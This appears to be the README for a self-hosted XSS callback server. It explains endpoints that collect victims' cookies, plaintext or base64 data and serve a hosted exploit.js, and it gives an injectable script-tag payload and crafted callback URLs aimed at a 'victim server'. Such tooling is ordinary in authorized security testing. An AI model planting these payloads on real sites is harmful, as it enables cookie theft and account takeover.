Get Started
Please make sure that you have set up all your variables inside the .env file before reading
Endpoints:
- /logger/{your_code} : This is where you make normal requests to (for request logging).
- /: This is where you request to generate injection alerts. There are query string parameters such as url, by, code, plaintext, cookie, and b64.
- /exploit.js: This is where the exploit.js file lies, you can link this js file remotely to the victim server with the script tag.
Parameters:
- url: Specifies location of the current document/webpage
- by: Specifies username of the user that sent this payload
- an action parameter (choices: plaintext, b64, cookie, or none (leave blank))
- xss: Specifies if it's an XSS attack
- code: This parameter is required as you need your code to access the endpoints (it is the same code in your .env file)
Headers for XSS testing
- xsend-xss-payload header (This header is used to track which XSS payload was used when detection is successful)
How to use the alerts webhook:
- 1.) You must first decide which action parameter to use plaintext, b64, or cookie, or none (leave blank)
- 2.) In this case I choose plaintext
- 3.) Then remember the required parameters: url, code, and by
- 4.) Craft the URL with those, http://localhost:4000/?url=victim_url&code=yourcode&by=yourusername&plaintext=
- 5.) Inject this inside of an html tag or javascript code that will make a request to this url
How to use the logger webhook:
- 1.) code is the only required parameter for this
- 2.) Craft the URL to the logger endpoint http://localhost:4000/logger/{your_code}/{custom_message}
- Example: http://localhost:4000/logger/123456/anythingblahblah
How to link to the exploit.js script:
- 1.) Craft the URL to the JS file http://localhost:4000/exploit.js
- 2.) Embed in the script tag <script src="http://localhost:4000/exploit.js"></script>
Now you can craft all the links into your XSS/HTML payload or even use it in other injection attacks that supports HTTP requests like some RCE and SSRF contexts. Check the generator here: Generator